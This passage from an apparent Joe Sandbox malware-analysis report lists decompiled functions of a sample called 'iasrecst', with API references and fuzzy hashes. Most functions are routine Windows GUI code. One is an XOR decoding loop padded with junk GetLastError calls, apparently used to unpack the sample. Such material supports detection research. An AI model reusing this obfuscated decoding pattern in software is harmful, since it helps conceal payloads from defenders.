					 *(_t109 + 0x1c) = _t84;
				}
				goto L9;
			}

APIs

MulDiv.KERNEL32(?,?,?), ref: 004272C4
MulDiv.KERNEL32(?,?,?), ref: 004272D6
SetRect.USER32 ref: 004272F4
OffsetRect.USER32(?,?,?), ref: 0042732D
OffsetRect.USER32(?,?,00000000), ref: 0042733E

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: Rect$Offset
String ID:
API String ID: 3858320380-0
Opcode ID: a8bcfc7a24c1dd58891d067b0bfb63c54d62dd3b19c554575f39b6ca731ca03a
Instruction ID: 9d4db4d92ebfce67b92012e8cfbb6e150ce2038beb84166a71d0e9c619fd8a43
Opcode Fuzzy Hash: a8bcfc7a24c1dd58891d067b0bfb63c54d62dd3b19c554575f39b6ca731ca03a
Instruction Fuzzy Hash: 15418871600A15DFD720CF68D944AAABBF6FB88300F484A2DE886D7655D734F805CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 0041AE9C, Relevance: 7.6, APIs: 5, Instructions: 118
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E0041AE9C(void* __ecx, void* __eflags) {
				struct tagPOINT* _t76;
				long* _t78;
				long* _t81;
				struct tagPOINT* _t82;
				signed int _t84;
				signed int _t85;
				signed int _t86;
				int _t87;
				struct tagPOINT* _t97;
				signed int _t108;
				void* _t123;
				void* _t125;

				E00406520(E0042A85C, _t125);
				_t123 = __ecx;
				_push(0);
				 *(_t125 - 0x10) =  *(__ecx + 0x40);
				 *(__ecx + 0x40) =  *(_t125 + 8);
				 *(__ecx + 0x44) =  *(_t125 + 0xc);
				 *(__ecx + 0x48) =  *(_t125 + 0x10);
				E0041A41D(_t125 - 0x24, __eflags);
				 *(_t125 - 4) =  *(_t125 - 4) & 0x00000000;
				E00419E91(_t125 - 0x24,  *(__ecx + 0x40));
				_t76 = __ecx + 0x4c;
				_t76->x =  *(__ecx + 0x44);
				_t76->y =  *(__ecx + 0x48);
				LPtoDP( *(_t125 - 0x1c), _t76, 1);
				_t78 =  *(_t125 + 0x14);
				_t97 = __ecx + 0x54;
				_t97->x =  *_t78;
				_t97->y = _t78[1];
				LPtoDP( *(_t125 - 0x1c), _t97, 1);
				_t81 =  *(_t125 + 0x18);
				_t82 = __ecx + 0x5c;
				_t82->x =  *_t81;
				_t82->y = _t81[1];
				LPtoDP( *(_t125 - 0x1c), _t82, 1);
				_t84 =  *(__ecx + 0x50);
				if(_t84 < 0) {
					 *(__ecx + 0x50) =  ~_t84;
				}
				_t85 =  *(_t123 + 0x58);
				if(_t85 < 0) {
					 *(_t123 + 0x58) =  ~_t85;
				}
				_t86 =  *(_t123 + 0x60);
				if(_t86 < 0) {
					 *(_t123 + 0x60) =  ~_t86;
				}
				 *(_t125 - 4) =  *(_t125 - 4) | 0xffffffff;
				_t87 = E0041A48F(_t125 - 0x24);
				_t108 = 0xa;
				if(_t97->x == 0) {
					asm("cdq");
					_t87 =  *(_t123 + 0x4c) / _t108;
					_t97->x = _t87;
				}
				if( *(_t123 + 0x58) == 0) {
					asm("cdq");
					_t87 =  *(_t123 + 0x50) / _t108;
					 *(_t123 + 0x58) = _t87;
				}
				if( *(_t123 + 0x5c) == 0) {
					asm("cdq");
					_t87 = _t97->x / _t108;
					 *(_t123 + 0x5c) = _t87;
				}
				if( *(_t123 + 0x60) == 0) {
					asm("cdq");
					_t87 =  *(_t123 + 0x58) / _t108;
					 *(_t123 + 0x60) = _t87;
				}
				if( *(_t123 + 0x1c) != 0) {
					E0041B2F1(_t123);
					_t87 =  *(_t125 - 0x10);
					if(_t87 !=  *((intOrPtr*)(_t123 + 0x40))) {
						_t87 = InvalidateRect( *(_t123 + 0x1c), 0, 1);
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t125 - 0xc));
				return _t87;
			}

APIs

__EH_prolog.LIBCMT ref: 0041AEA1

Part of subcall function 0041A41D: __EH_prolog.LIBCMT ref: 0041A422
Part of subcall function 0041A41D: GetWindowDC.USER32(?,?,?,0041AED0,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0041A44B

Part of subcall function 00419E91: SetMapMode.GDI32(?,?), ref: 00419EAA
Part of subcall function 00419E91: SetMapMode.GDI32(?,?), ref: 00419EB8

LPtoDP.GDI32(?,?,00000001), ref: 0041AEF9
LPtoDP.GDI32(?,?,00000001), ref: 0041AF11
LPtoDP.GDI32(?,?,00000001), ref: 0041AF29
InvalidateRect.USER32(?,00000000,00000001), ref: 0041AFB7

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: H_prologMode$InvalidateRectWindow
String ID:
API String ID: 2422810626-0
Opcode ID: 833de7a5b383fbafa19164f96b33c5ca989ee9024f938b107583b44dd389414c
Instruction ID: ea718bac83f46552081215f01c1c436204e2ca2be48b4d518ea9ba6a6dc7aab3
Opcode Fuzzy Hash: 833de7a5b383fbafa19164f96b33c5ca989ee9024f938b107583b44dd389414c
Instruction Fuzzy Hash: 904104B0601B159FCB20DF6AC880A9AB7F5FF48304F10482EE946D7790D7B5E855CB15

Uniqueness

Uniqueness Score: -1.00%

Function 00401163, Relevance: 7.6, APIs: 6, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E00401163(intOrPtr _a4, intOrPtr _a8, char* _a12) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				char _t49;
				intOrPtr _t58;
				intOrPtr _t90;
				intOrPtr _t107;
				void* _t115;

				_v8 =  *_a12;
				_v12 =  *((intOrPtr*)(_a12 + 1));
				_v16 = 0;
				while(_v16 < _a8) {
					asm("cdq");
					_v8 = ((_v8 & 0x000000ff) + 1) % 0x362;
					asm("cdq");
					_v12 = (0 + (_v12 & 0x000000ff)) % 0x362;
					_t58 =  *0x437cc0; // 0x2181c90
					_t107 =  *0x437cc0; // 0x2181c90
					E0040129C(_v8 & 0x000000ff, _t107 + (_v8 & 0x000000ff), _t58 + (_v12 & 0x000000ff));
					_t115 = _t115 + 8;
					asm("cdq");
					_v20 = 0;
					GetLastError();
					GetLastError();
					GetLastError();
					GetLastError();
					GetLastError();
					GetLastError();
					_t90 =  *0x437cc0; // 0x2181c90
					 *(_a4 + _v16) =  *(_a4 + _v16) ^  *(_t90 + (_v20 & 0x000000ff));
					_v16 = _v16 + 1;
				}
				_t49 = _v8;
				 *_a12 = _t49;
				 *((char*)(_a12 + 1)) = _v12;
				return _t49;
			}

APIs

GetLastError.KERNEL32 ref: 0040123B
GetLastError.KERNEL32 ref: 00401241
GetLastError.KERNEL32 ref: 00401247
GetLastError.KERNEL32 ref: 0040124D
GetLastError.KERNEL32 ref: 00401253
GetLastError.KERNEL32 ref: 00401259

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 2fb4c9c442cb0e0720c7f3357a9b25f75bd02d34cfc46486d38f63fe239aacba
Instruction ID: 50b4629dd769d307c311c64c04c265a3d6c1846e1b25a8a03c552174e884fb50
Opcode Fuzzy Hash: 2fb4c9c442cb0e0720c7f3357a9b25f75bd02d34cfc46486d38f63fe239aacba
Instruction Fuzzy Hash: 3031E535A0928A9FCB05CF58CC917BDBF72BF89300F1880F8D4519B352C535AA51DB54

Uniqueness

Uniqueness Score: -1.00%

Function 00415DE6, Relevance: 7.6, APIs: 5, Instructions: 91
windowCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00415DE6(void* __ebx, intOrPtr __ecx, void* __eflags) {
				void* _t31;
				signed int _t42;
				struct HWND__* _t62;
				void* _t64;

				E00406520(E00429E94, _t64);
				 *((intOrPtr*)(_t64 - 0x10)) = __ecx;
				E00412F9D(_t64 - 0x38);
				E0041331F(_t64 - 0x74);
				 *(_t64 - 4) = 0;
				_t62 = GetTopWindow( *(__ecx + 0x1c));
				if(_t62 != 0) {
					do {
						 *(_t64 - 0x58) = _t62;
						 *(_t64 - 0x34) = GetDlgCtrlID(_t62) & 0x0000ffff;
						_push(_t62);
						 *((intOrPtr*)(_t64 - 0x24)) = _t64 - 0x74;
						if(E00413767() == 0 || E00412DF9(_t35, 0, 0xbd11ffff, _t64 - 0x38, 0) == 0) {
							if(E00412DF9( *((intOrPtr*)(_t64 - 0x10)),  *(_t64 - 0x34), 0xffffffff, _t64 - 0x38, 0) == 0) {
								_t46 =  *((intOrPtr*)(_t64 + 0xc));
								if( *((intOrPtr*)(_t64 + 0xc)) != 0) {
									if((SendMessageA( *(_t64 - 0x58), 0x87, 0, 0) & 0x00000020) == 0) {
										L11:
										_t46 = 0;
									} else {
										_t42 = E00416528(_t64 - 0x74) & 0x0000000f;
										if(_t42 == 3 || _t42 == 6 || _t42 == 7 || _t42 == 9) {
											goto L11;
										}
									}
								}
								E00413162(_t64 - 0x38,  *((intOrPtr*)(_t64 + 8)), _t46);
							}
						}
						_t62 = GetWindow(_t62, 2);
					} while (_t62 != 0);
				}
				 *(_t64 - 4) =  *(_t64 - 4) | 0xffffffff;
				 *(_t64 - 0x58) = 0;
				_t31 = E00413DB2(_t64 - 0x74);
				 *[fs:0x0] =  *((intOrPtr*)(_t64 - 0xc));
				return _t31;
			}

APIs

__EH_prolog.LIBCMT ref: 00415DEB
GetTopWindow.USER32(?), ref: 00415E12
GetDlgCtrlID.USER32 ref: 00415E27
SendMessageA.USER32 ref: 00415E80
GetWindow.USER32(00000000,00000002), ref: 00415EBB

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: Window$CtrlH_prologMessageSend
String ID:
API String ID: 4125289812-0
Opcode ID: eddda41c1041d001e68a3ff9ed0eca5f426747ef9a7cc5a696e2efd6d8ecddce
Instruction ID: a7ff307ea5fd4ed9b42493fc3e47649cc0ac06b73cf1fa4f536db176ac1b2ba5
Opcode Fuzzy Hash: eddda41c1041d001e68a3ff9ed0eca5f426747ef9a7cc5a696e2efd6d8ecddce
Instruction Fuzzy Hash: 5331A272D00614EACB21EBA5DC859EFBB74EF95304F60022BF411E2295E7784E81CB58

Uniqueness

Uniqueness Score: -1.00%

Function 004105C2, Relevance: 7.6, APIs: 5, Instructions: 88
windowCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E004105C2(intOrPtr __ecx) {
				void* __esi;
				struct HWND__* _t40;
				void* _t42;
				void* _t50;
				intOrPtr _t63;
				signed int _t66;
				void* _t83;

				_t63 = __ecx;
				E00406520(E0042A8D0, _t83);
				_push(__ecx);
				_push(__ecx);
				 *(_t83 - 0x10) =  *(_t83 - 0x10) & 0x00000000;
				 *((intOrPtr*)(_t83 - 0x14)) = __ecx;
				if(( *(__ecx + 0x92) & 0x00000008) == 0) {
					L9:
					E00416B16( *((intOrPtr*)(_t83 + 8)), _t83,  *((intOrPtr*)(_t63 + 0x78)));
				} else {
					_t40 =  *(__ecx + 0x1c);
					if(_t40 == 0) {
						goto L9;
					} else {
						_t66 =  *0x436980; // 0x436994
						 *(_t83 - 0x10) = _t66;
						 *(_t83 - 4) =  *(_t83 - 4) & 0x00000000;
						_t42 = E00413740(_t83, GetParent(_t40));
						if(SendMessageA( *(_t42 + 0x1c), 0x464, 0x104, E00416CC1(_t83 - 0x10, _t83, 0x104)) >= 0) {
							E00416D10(_t83 - 0x10, __eflags, 0xffffffff);
						} else {
							E00416A77(_t83 - 0x10, 0x104);
						}
						if( *((intOrPtr*)( *(_t83 - 0x10) - 8)) == 0) {
							L8:
							 *(_t83 - 4) =  *(_t83 - 4) | 0xffffffff;
							E00416AEC(_t83 - 0x10);
							_t63 =  *((intOrPtr*)(_t83 - 0x14));
							goto L9;
						} else {
							_t50 = E00413740(_t83, GetParent( *( *((intOrPtr*)(_t83 - 0x14)) + 0x1c)));
							if(SendMessageA( *(_t50 + 0x1c), 0x465, 0x104, E00416CC1(_t83 - 0x10, _t83, 0x104)) >= 0) {
								E00416D10(_t83 - 0x10, __eflags, 0xffffffff);
								E00416861( *((intOrPtr*)(_t83 + 8)), _t83 - 0x10);
								 *(_t83 - 4) =  *(_t83 - 4) | 0xffffffff;
								E00416AEC(_t83 - 0x10);
							} else {
								E00416A77(_t83 - 0x10, 0x104);
								goto L8;
							}
						}
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t83 - 0xc));
				return  *((intOrPtr*)(_t83 + 8));
			}

APIs

__EH_prolog.LIBCMT ref: 004105C7
GetParent.USER32(?), ref: 00410604
SendMessageA.USER32 ref: 0041062C
GetParent.USER32(?), ref: 00410655
SendMessageA.USER32 ref: 00410672

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: MessageParentSend$H_prolog
String ID:
API String ID: 1056721960-0
Opcode ID: 612438848c30a4d30a5efd75428cd7e7014c67747928bacea5f91ea9e0d91145
Instruction ID: 07ce01a875e9ee4c694f432b72042445b87f7b3637ebdeb0f8d3e1dd1834bd9a
Opcode Fuzzy Hash: 612438848c30a4d30a5efd75428cd7e7014c67747928bacea5f91ea9e0d91145
Instruction Fuzzy Hash: 13318170600216ABCF14EFA1DC45AEFB774FF40358F11452AE421A71D1DB78D995CB58

Uniqueness

Uniqueness Score: -1.00%

Function 004150E7, Relevance: 7.6, APIs: 5, Instructions: 69
windowCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E004150E7(void* __ecx, int _a4, int _a8, RECT* _a12, RECT* _a16) {
				struct tagRECT _v20;
				int _t21;
				struct HWND__* _t22;
				struct HWND__* _t41;
				void* _t42;
				intOrPtr* _t43;

				_t42 = __ecx;
				_t21 = IsWindowVisible( *(__ecx + 0x1c));
				if(_t21 != 0 || _a12 != _t21 || _a16 != _t21) {
					_t22 = ScrollWindow( *(_t42 + 0x1c), _a4, _a8, _a12, _a16);
				} else {
					_push(5);
					_push( *(_t42 + 0x1c));
					while(1) {
						_t22 = GetWindow();
						_t41 = _t22;
						if(_t41 == 0) {
							goto L7;
						}
						GetWindowRect(_t41,  &_v20);
						E0041A2F1(_t42,  &_v20);
						SetWindowPos(_t41, 0, _v20.left + _a4, _v20.top + _a8, 0, 0, 0x15);
						_push(2);
						_push(_t41);
					}
				}
				L7:
				_t43 =  *((intOrPtr*)(_t42 + 0x34));
				if(_t43 != 0 && _a12 == 0) {
					return  *((intOrPtr*)( *_t43 + 0x58))(_a4, _a8);
				}
				return _t22;
			}

APIs

IsWindowVisible.USER32(?), ref: 004150F5
GetWindow.USER32(?,00000005), ref: 00415114
GetWindowRect.USER32 ref: 00415121

Part of subcall function 0041A2F1: ScreenToClient.USER32 ref: 0041A305
Part of subcall function 0041A2F1: ScreenToClient.USER32 ref: 0041A30E

SetWindowPos.USER32(00000000,00000000,?,?,00000000,00000000,00000015,?), ref: 0041514C
ScrollWindow.USER32 ref: 00415166

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: Window$ClientScreen$RectScrollVisible
String ID:
API String ID: 1714389229-0
Opcode ID: ef22ae36b66fc6a2d65463419495730ca9f2549ea02bd598369f82df62db7c6c
Instruction ID: 05942f404d56e3bc249559bb1a558a0c6e37b23f98baaac5964d945a6837c05d
Opcode Fuzzy Hash: ef22ae36b66fc6a2d65463419495730ca9f2549ea02bd598369f82df62db7c6c
Instruction Fuzzy Hash: 03216A31A00609FFCF229F54DC48EFF7BB9EB88744B44452AF90596261D774AC51CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00420B23, Relevance: 7.6, APIs: 5, Instructions: 68
windowCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E00420B23(intOrPtr* __ecx, void* __ebp, signed int _a4) {
				void* _t21;
				signed char _t22;
				signed int _t40;
				intOrPtr* _t44;
				void* _t45;
				struct HWND__* _t47;

				_t45 = __ebp;
				_t40 = _a4;
				_t44 = __ecx;
				if(_t40 != 0 && ( *(__ecx + 0x24) & 0x00000004) != 0) {
					E004166CE(__ecx, 0);
					return SetFocus(0);
				}
				_t21 = E00413740(_t45, GetParent( *(_t44 + 0x1c)));
				if(_t21 != 0) {
					return _t21;
				} else {
					if(_t40 != 0) {
						_t22 =  *(_t44 + 0x24);
						_push(_t45);
						if((_t22 & 0x00000080) != 0) {
							 *(_t44 + 0x24) = _t22 & 0x0000007f;
							 *((intOrPtr*)( *_t44 + 0x8c))();
							_t47 =  *(_t44 + 0x1c);
							if(GetActiveWindow() == _t47) {
								SendMessageA(_t47, 6, 1, 0);
							}
						}
						if(( *(_t44 + 0x24) & 0x00000020) != 0) {
							SendMessageA( *(_t44 + 0x1c), 0x86, 1, 0);
						}
					} else {
						if( *((intOrPtr*)(_t44 + 0xa0)) == 0) {
							 *(_t44 + 0x24) =  *(_t44 + 0x24) | 0x00000080;
							 *((intOrPtr*)( *_t44 + 0x88))();
						}
					}
					asm("sbb edi, edi");
					return E00420BD9(_t44, ( ~_t40 & 0xfffffff0) + 0x20);
				}
			}

APIs

SetFocus.USER32(00000000,00000000), ref: 00420B3F
GetParent.USER32(?), ref: 00420B4D
GetActiveWindow.USER32 ref: 00420B99
SendMessageA.USER32 ref: 00420BAA
SendMessageA.USER32 ref: 00420BBF

Part of subcall function 004166CE: EnableWindow.USER32(?,?), ref: 004166DC

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: MessageSendWindow$ActiveEnableFocusParent
String ID:
API String ID: 3951091596-0
Opcode ID: 41abd3b57886a5f7d358e044880a08afca2a9066e6390131e2ec1389df34b110
Instruction ID: b973cea33cd40a65d929727e5f9c9eb7024a6c5d1ea90242926d9fabef0d3f3f
Opcode Fuzzy Hash: 41abd3b57886a5f7d358e044880a08afca2a9066e6390131e2ec1389df34b110
Instruction Fuzzy Hash: E91106313003105FD7305FA4EC84B1BBBE9AF59B08F500A2EF596AA2D2CB74B841870C

Uniqueness

Uniqueness Score: -1.00%

Function 00420BD9, Relevance: 7.6, APIs: 5, Instructions: 65
windowCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E00420BD9(void* __ecx, signed int _a4) {
				struct HWND__* _t20;
				void* _t23;
				void* _t32;
				void* _t33;
				struct HWND__* _t34;

				_t33 = __ecx;
				if((E00416528(__ecx) & 0x40000000) == 0) {
					_t32 = E00414DCC(__ecx);
				} else {
					_t32 = __ecx;
				}
				if((_a4 & 0x0000000c) != 0) {
					_t23 = E004166B3(_t32);
					if(( !_a4 & 0x00000008) == 0 || _t23 == 0 || _t32 == _t33) {
						SendMessageA( *(_t32 + 0x1c), 0x86, 0, 0);
					} else {
						 *(_t33 + 0x25) =  *(_t33 + 0x25) | 0x00000002;
						SendMessageA( *(_t32 + 0x1c), 0x86, 1, 0);
						 *(_t33 + 0x25) =  *(_t33 + 0x25) & 0x000000fd;
					}
				}
				_push(5);
				_push(GetDesktopWindow());
				while(1) {
					_t20 = GetWindow();
					_t34 = _t20;
					if(_t34 == 0) {
						break;
					}
					if(E004208E0( *(_t32 + 0x1c), _t34) != 0) {
						SendMessageA(_t34, 0x36d, _a4, 0);
					}
					_push(2);
					_push(_t34);
				}
				return _t20;
			}

APIs

Part of subcall function 00416528: GetWindowLongA.USER32 ref: 00416534

SendMessageA.USER32 ref: 00420C2F
SendMessageA.USER32 ref: 00420C43
GetDesktopWindow.USER32 ref: 00420C47
GetWindow.USER32(00000000), ref: 00420C54
SendMessageA.USER32 ref: 00420C75

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: MessageSendWindow$DesktopLong
String ID:
API String ID: 2272707703-0
Opcode ID: 37ae4cba53c8f9abbb6458094d097816d73afe21348efe1223aaa5812bafa3d4
Instruction ID: c41997b72d8c96214e5640ecb70f441624ebe3089d32e1eab02e12923e6e0a2e
Opcode Fuzzy Hash: 37ae4cba53c8f9abbb6458094d097816d73afe21348efe1223aaa5812bafa3d4
Instruction Fuzzy Hash: AA113A3134072573E3355722AC06F2FBAC89F41B94F95432AB6402A2D3CF59DC42839D

Uniqueness

Uniqueness Score: -1.00%

Function 0042153C, Relevance: 7.6, APIs: 5, Instructions: 57
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0042153C(intOrPtr __ecx, struct HWND__* _a4, unsigned int _a8) {
				intOrPtr _v8;
				char _v268;
				void* __ebp;
				int _t20;
				unsigned int _t39;
				intOrPtr _t45;

				_v8 = __ecx;
				_t45 =  *((intOrPtr*)(E00424BFB() + 4));
				if(_t45 != 0 && _a8 != 0) {
					_t39 = _a8 >> 0x10;
					if(_t39 != 0) {
						_t20 =  *(_t45 + 0xb0);
						if(_a8 == _t20 && _t39 ==  *(_t45 + 0xb2)) {
							GlobalGetAtomNameA(_t20,  &_v268, 0x103);
							GlobalAddAtomA( &_v268);
							GlobalGetAtomNameA( *(_t45 + 0xb2),  &_v268, 0x103);
							GlobalAddAtomA( &_v268);
							SendMessageA(_a4, 0x3e4,  *(_v8 + 0x1c), ( *(_t45 + 0xb2) & 0x0000ffff) << 0x00000010 |  *(_t45 + 0xb0) & 0x0000ffff);
						}
					}
				}
				return 0;
			}

0x00421546
0x0042154e
0x00421553
0x00421567
0x0042156d
0x00421573
0x0042157e
0x0042159e
0x004215ad
0x004215c3
0x004215cc
0x004215f0
0x004215f7
0x0042157e
0x0042156d
0x004215fc

APIs

GlobalGetAtomNameA.KERNEL32(?,?,00000103), ref: 0042159E
GlobalAddAtomA.KERNEL32 ref: 004215AD
GlobalGetAtomNameA.KERNEL32(?,?,00000103), ref: 004215C3
GlobalAddAtomA.KERNEL32 ref: 004215CC
SendMessageA.USER32 ref: 004215F0

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: AtomGlobal$Name$MessageSend
String ID:
API String ID: 1515195355-0
Opcode ID: 8d4100d216ef3efb6da3e926417cff5768516e73762e0a26ee689d182ea64f2a
Instruction ID: ddc056c18c8f30134593d029485027bb11089ec59ad006056310b0d46243fd91
Opcode Fuzzy Hash: 8d4100d216ef3efb6da3e926417cff5768516e73762e0a26ee689d182ea64f2a
Instruction Fuzzy Hash: EB119475600319AADB20EB68DC44AEBB3BCEB54700F404456E59697190E7B8EAC1CB64

Uniqueness

Uniqueness Score: -1.00%

Function 004142C3, Relevance: 7.6, APIs: 5, Instructions: 52
stringregistryCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E004142C3() {
				CHAR* _t35;
				WNDCLASSA* _t37;
				void* _t40;
				void* _t42;

				E00406520(E00429E28, _t40);
				_t37 =  *(_t40 + 8);
				 *((intOrPtr*)(_t40 - 0x10)) = _t42 - 0x30;
				if(GetClassInfoA(_t37->hInstance, _t37->lpszClassName, _t40 - 0x38) != 0) {
					L5:
					_push(1);
					_pop(0);
					L6:
					 *[fs:0x0] =  *((intOrPtr*)(_t40 - 0xc));
					return 0;
				}
				if(RegisterClassA(_t37) != 0) {
					if( *((intOrPtr*)(E00424BFB() + 0x14)) != 0) {
						E00425F56(1);
						 *(_t40 - 4) = 0;
						_t9 = E00424BFB() + 0x34; // 0x34
						_t35 = _t9;
						lstrcatA(_t35, _t37->lpszClassName);
						 *(_t40 + 0xa) = 0xa;
						 *((char*)(_t40 + 0xb)) = 0;
						lstrcatA(_t35, _t40 + 0xa);
						 *(_t40 - 4) =  *(_t40 - 4) | 0xffffffff;
						E00425FC6(1);
					}
					goto L5;
				}
				goto L6;
			}

APIs

__EH_prolog.LIBCMT ref: 004142C8
GetClassInfoA.USER32 ref: 004142E3
RegisterClassA.USER32 ref: 004142EE
lstrcatA.KERNEL32(00000034,?,00000001), ref: 00414325
lstrcatA.KERNEL32(00000034,?), ref: 00414333

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: Classlstrcat$H_prologInfoRegister
String ID:
API String ID: 106226465-0
Opcode ID: 916e8ed1c64fa195a03bc34d33fa3e71f0ae85317fb3a46a938f050b4ccd874b
Instruction ID: 1018f0675467b52ee35bd5ff78e2a168c77a44711dd41a513890d329257c2a90
Opcode Fuzzy Hash: 916e8ed1c64fa195a03bc34d33fa3e71f0ae85317fb3a46a938f050b4ccd874b
Instruction Fuzzy Hash: D4112531B04218BECB10AFA5EC41BDE7FB8EF40304F00442BF816A3191C778E6418AA8

Uniqueness

Uniqueness Score: -1.00%

Function 00427EF7, Relevance: 7.5, APIs: 5, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E00427EF7(void* __ecx, char _a8) {
